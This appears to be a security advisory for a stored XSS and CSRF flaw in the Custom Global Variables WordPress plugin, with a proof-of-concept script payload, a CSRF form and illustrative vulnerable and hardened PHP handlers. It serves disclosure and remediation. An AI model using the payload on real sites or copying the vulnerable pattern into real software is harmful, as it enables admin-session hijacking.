Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)
The plugin does not sanitise the 'name' field of a variable added in its settings page before storing and echoing it back, leading to a Stored Cross-Site Scripting issue. Because the same endpoint also lacks CSRF (nonce) and capability checks, an attacker can have a logged-in administrator add the payload via a crafted page, and the stored script then runs in the administrator's browser whenever the settings page is viewed, allowing further unwanted actions to be performed with their privileges.
Proof of Concept
As an administrator, go to the Settings > Custom Global Variables page, enter the following payload ("><script>alert(/XSS/)</script><) in the 'name' field, enter any value in the 'value' field and submit the form. The alert fires on the settings page. Since the request carries no nonce and no capability check is performed, the same payload can be added by a logged-in administrator who submits the following form from an attacker-controlled page:
<!-- CSRF form: targets the plugin's settings handler; the submit is the only user interaction needed -->
<form action="https://example.com/wp-admin/options-general.php?page=custom-global-variables" method="POST">
<input type="hidden" name="vars[name]" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="vars[val]" value="a" />
<input type="submit" value="Submit request" />
</form>
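The following is an added illustration and is not the plugin's own code: a minimal settings handler written in the shape of the issue described above (a POST parameter stored to an option and echoed back without escaping, no nonce, no capability check), beside a hardened version using standard WordPress APIs. The function and option names (cgv_*), the nonce action name and the form markup are assumptions made for the example.

```php
<?php
// Added example, not the Custom Global Variables plugin's code.
// Names prefixed cgv_ are hypothetical.

/* ---------- VULNERABLE PATTERN ---------- */

// Anyone who can reach admin_init with a vars[] POST body gets their input stored:
// no nonce (CSRF) check, no capability check, no sanitisation.
function cgv_save_vulnerable() {
    if ( ! isset( $_POST['vars'] ) ) {
        return;
    }
    $vars   = get_option( 'cgv_vars', array() );
    $vars[] = array(
        'name' => $_POST['vars']['name'], // stored exactly as received
        'val'  => $_POST['vars']['val'],
    );
    update_option( 'cgv_vars', $vars );
}

// The stored name is printed into an attribute unescaped, so a name of
// "><script>alert(/XSS/)</script> closes the attribute and the tag and
// injects a script element that runs for every admin who views the page.
function cgv_render_vulnerable() {
    foreach ( get_option( 'cgv_vars', array() ) as $var ) {
        echo '<input type="text" name="vars[name]" value="' . $var['name'] . '" />';
    }
}

/* ---------- HARDENED PATTERN ---------- */

// The form now carries a nonce tied to the current user and the 'cgv_save_var' action.
function cgv_render_form_hardened() {
    $action = admin_url( 'options-general.php?page=custom-global-variables' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( 'cgv_save_var', 'cgv_nonce' ); // hidden _wpnonce-style field
    echo '<input type="text" name="vars[name]" value="" />';
    echo '<input type="text" name="vars[val]" value="" />';
    echo '<input type="submit" value="Add" />';
    echo '</form>';
}

function cgv_save_hardened() {
    if ( ! isset( $_POST['vars'] ) || ! is_array( $_POST['vars'] ) ) {
        return;
    }
    // Capability check: only users allowed to manage options may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to do that.' ) );
    }
    // CSRF check: dies unless the request carries a nonce valid for this user/action.
    // A form hosted on an attacker's site cannot obtain this value.
    check_admin_referer( 'cgv_save_var', 'cgv_nonce' );

    // Sanitise on input: strip tags, control characters and surrounding whitespace.
    $name = sanitize_text_field( wp_unslash( $_POST['vars']['name'] ?? '' ) );
    $val  = sanitize_text_field( wp_unslash( $_POST['vars']['val'] ?? '' ) );
    if ( '' === $name ) {
        return; // a variable needs a name; ignore empty submissions
    }

    $vars   = get_option( 'cgv_vars', array() );
    $vars[] = array( 'name' => $name, 'val' => $val );
    update_option( 'cgv_vars', $vars );
}

// Escape on output for the context it is printed into. This is what actually
// stops stored XSS even if a value reached the database through another path.
function cgv_render_hardened() {
    foreach ( get_option( 'cgv_vars', array() ) as $var ) {
        echo '<input type="text" name="vars[name]" value="' . esc_attr( $var['name'] ) . '" />';
        echo '<span>' . esc_html( $var['val'] ) . '</span>';
    }
}

add_action( 'admin_init', 'cgv_save_hardened' );
```

The two checks address different halves of the advisory: `current_user_can( 'manage_options' )` closes the missing capability check, and `check_admin_referer()` closes the CSRF vector, so the PoC form above would be rejected even when submitted by an authenticated administrator. Input sanitisation reduces what gets stored, but `esc_attr()` / `esc_html()` at the point of output are the controls that prevent the stored payload from executing, and both should be present.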